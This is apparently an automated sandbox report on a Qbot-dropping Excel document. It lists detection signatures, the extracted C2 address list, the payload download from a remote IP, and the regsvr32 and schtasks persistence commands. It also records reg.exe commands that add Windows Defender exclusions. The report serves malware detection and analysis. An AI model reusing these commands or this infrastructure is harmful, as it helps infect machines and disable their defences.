Windows Analysis Report Compensation_Reject-958463727-09292021.xls

Overview

General Information

Sample Name: Compensation_Reject-958463727-09292021.xls
Analysis ID: 494138
MD5: 771470585379f22a6c76e4ff08728512
SHA1: 996717d117629fb99f697129c98dab92eac0eca2
SHA256: 310121955d11b8c4ecb14a5373f2dda35ddaac230db890b6e306302e22b11ffe
Tags: xls

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 14.2.regsvr32.exe.701e0000.6.unpack Malware Configuration Extractor: Qbot {"Bot id": "obama106", "Campaign": "1632905607", "Version": "402.363", "C2 list": ["37.210.152.224:995", "120.151.47.189:443", "105.198.236.99:443", "122.11.220.212:2222", "199.27.127.129:443", "41.251.41.14:995", "216.201.162.158:443", "124.123.42.115:2078", "181.118.183.94:443", "120.150.218.241:995", "185.250.148.74:443", "217.17.56.163:443", "182.181.78.18:995", "140.82.49.12:443", "105.159.144.186:995", "89.101.97.139:443", "217.17.56.163:0", "27.223.92.142:995", "95.77.223.148:443", "109.190.253.11:2222", "81.250.153.227:2222", "190.198.206.189:2222", "81.241.252.59:2078", "136.232.34.70:443", "47.22.148.6:443", "93.8.66.216:443", "124.123.42.115:2222", "217.17.56.163:2222", "217.17.56.163:2078", "217.17.56.163:465", "41.228.22.180:443", "76.25.142.196:443", "71.74.12.34:443", "71.80.168.245:443", "75.188.35.168:443", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "67.165.206.193:993", "38.10.201.211:443", "72.252.201.69:443", "71.60.246.5:443", "92.148.59.207:2222", "92.157.171.41:2222", "24.139.72.117:443", "186.18.205.199:995", "24.229.150.54:995", "47.40.196.233:2222", "24.55.112.61:443", "177.130.82.197:2222", "217.17.56.163:443", "217.17.56.163:443", "109.12.111.14:443", "68.204.7.158:443", "186.87.135.68:995", "80.6.192.58:443", "103.148.120.144:443", "75.66.88.33:443", "173.25.166.81:443", "47.40.196.233:2222", "187.156.138.172:443", "82.77.137.101:995", "173.234.155.233:443", "2.178.108.147:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: c:\886_Soon\slip\wrong\126\pull.pdb source: regsvr32.exe, 00000006.00000002.811400368.00000000705DD000.00000002.00020000.sdmp, explorer.exe, 00000007.00000003.811813174.0000000002660000.00000004.00000001.sdmp
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.811519854.0000000002660000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057AEF6 FindFirstFileW,FindNextFileW, 6_2_7057AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003CAEF6 FindFirstFileW,FindNextFileW, 7_2_003CAEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701EAEF6 FindFirstFileW,FindNextFileW, 14_2_701EAEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_0037AEF6 FindFirstFileW,FindNextFileW, 15_2_0037AEF6

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44469.4662202546[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.165.62.15:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.165.62.15:80

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 30 Sep 2021 09:12:37 GMTContent-Type: application/octet-streamContent-Length: 725504Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44469.4662202546.dat"
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44469.4662202546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.15Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: regsvr32.exe, 00000006.00000002.810733585.0000000002170000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.1075133780.0000000001FD0000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.1075013611.0000000000800000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.811888185.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.810268274.00000000007C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.813547188.0000000001CB0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.814518322.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.887028120.0000000000990000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.810733585.0000000002170000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.1075133780.0000000001FD0000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.1075013611.0000000000800000.00000002.00020000.sdmp, regsvr32.exe, 0000000E.00000002.885542978.0000000000F30000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44469.4662202546[1].dat

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 21 example of notification 22 23 ( 0 Thlsfi|eor
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44469.4662202546[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70585000 6_2_70585000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70586EF0 6_2_70586EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058237E 6_2_7058237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70581790 6_2_70581790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7062453A 6_2_7062453A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D5000 7_2_003D5000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D6EF0 7_2_003D6EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D237E 7_2_003D237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D1790 7_2_003D1790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F5000 14_2_701F5000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F6EF0 14_2_701F6EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F237E 14_2_701F237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F1790 14_2_701F1790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_7029453A 14_2_7029453A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00385000 15_2_00385000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00386EF0 15_2_00386EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_0038237E 15_2_0038237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00381790 15_2_00381790
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Compensation_Reject-958463727-09292021.xls OLE, VBA macro line: Sub auto_open()
Source: Compensation_Reject-958463727-09292021.xls OLE, VBA macro line: Sub auto_close()
Source: Compensation_Reject-958463727-09292021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 6_2_7057C702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 6_2_7057CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701EC702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 14_2_701EC702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701ECBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 14_2_701ECBB9
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: Drezd.red.15.dr Static PE information: No import functions for PE file found
Source: Drezd.red.7.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yenslqus' /d '0'
Document contains embedded VBA macros
Source: Compensation_Reject-958463727-09292021.xls OLE indicator, VBA macros: true
PE file overlay found
Source: Drezd.red.15.dr Static PE information: Data appended to the last section found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: 44469.4662202546[1].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Drezd.red.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Drezd.red.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Drezd.red.7.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................!..........&].....(.P.............................)"................................................................!.....
Source: C:\Windows\System32\reg.exe Console Write: ................$...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.......N.......(...............
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.(.....N.......(...............
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hhxoksfm /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 11:16 /ET 11:28
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {0A2617DB-2F69-45ED-A602-BD27C244EA7E} S-1-5-18:NT AUTHORITY\System:Service:
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yenslqus' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gruwmuaixpvu' /d '0'
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE05F.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@28/6@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057D565 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 6_2_7057D565
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701E30AA StartServiceCtrlDispatcherA, 14_2_701E30AA
Source: Compensation_Reject-958463727-09292021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057ABE5 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 6_2_7057ABE5
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{A47DAF0F-7FB7-4753-9743-D8AECBE22FD6}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{2EC96162-D66A-45F6-8B30-291D71698D66}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{2EC96162-D66A-45F6-8B30-291D71698D66}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{30331AEC-52A2-4F0B-9335-DB272302A70B}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{A47DAF0F-7FB7-4753-9743-D8AECBE22FD6}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{30331AEC-52A2-4F0B-9335-DB272302A70B}
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057A55C FindResourceA, 6_2_7057A55C
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058A00E push ebx; ret 6_2_7058A00F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058D485 push FFFFFF8Ah; iretd 6_2_7058D50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058D4B6 push FFFFFF8Ah; iretd 6_2_7058D50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70589D5C push cs; iretd 6_2_70589E32
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70589E5E push cs; iretd 6_2_70589E32
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058BB21 push esi; iretd 6_2_7058BB26
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7059704B push es; retf 6_2_70596FF5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70596076 push 108F5F56h; ret 6_2_7059607F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70594C6B push eax; iretd 6_2_70594C78
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70592168 push ebx; iretd 6_2_705921E6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_705921CA push ebx; iretd 6_2_705921E6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_705959CA push ebp; iretd 6_2_705959CB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70595E58 push 8BB03089h; retf 6_2_70595E9B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70593A3E push cs; retf 6_2_70593A62
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70598AF9 push esi; retf 6_2_70598B3E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70598B36 push esi; retf 6_2_70598B3E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70596FD6 push es; retf 6_2_70596FF5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70596BFB push ecx; ret 6_2_70596C06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7062188D push ecx; ret 6_2_7062188E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7062394A push edx; retf 6_2_70623976
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70623E25 push ebx; retf 004Ch 6_2_70623E29
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003DA00E push ebx; ret 7_2_003DA00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003DD4B6 push FFFFFF8Ah; iretd 7_2_003DD50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003DD485 push FFFFFF8Ah; iretd 7_2_003DD50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D9D5C push cs; iretd 7_2_003D9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D9E5E push cs; iretd 7_2_003D9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003DBB21 push esi; iretd 7_2_003DBB26
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701FA00E push ebx; ret 14_2_701FA00F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701FD485 push FFFFFF8Ah; iretd 14_2_701FD50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701FD4B6 push FFFFFF8Ah; iretd 14_2_701FD50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F9D5C push cs; iretd 14_2_701F9E32
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057DFEF LoadLibraryA,GetProcAddress, 6_2_7057DFEF
PE file contains an invalid checksum
Source: Drezd.red.15.dr Static PE information: real checksum: 0xbc64f should be: 0x5c7f
Source: Drezd.red.7.dr Static PE information: real checksum: 0xbc64f should be: 0xbe929

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44469.4662202546[1].dat
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hhxoksfm /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 11:16 /ET 11:28
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701E30AA StartServiceCtrlDispatcherA, 14_2_701E30AA

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3032 base: C102D value: E9 9B 4C 30 00
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2800 base: C102D value: E9 9B 4C 2B 00
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep count: 44 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2908 Thread sleep time: -96000s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 1176 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960 Thread sleep count: 49 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1412 Thread sleep count: 61 > 30
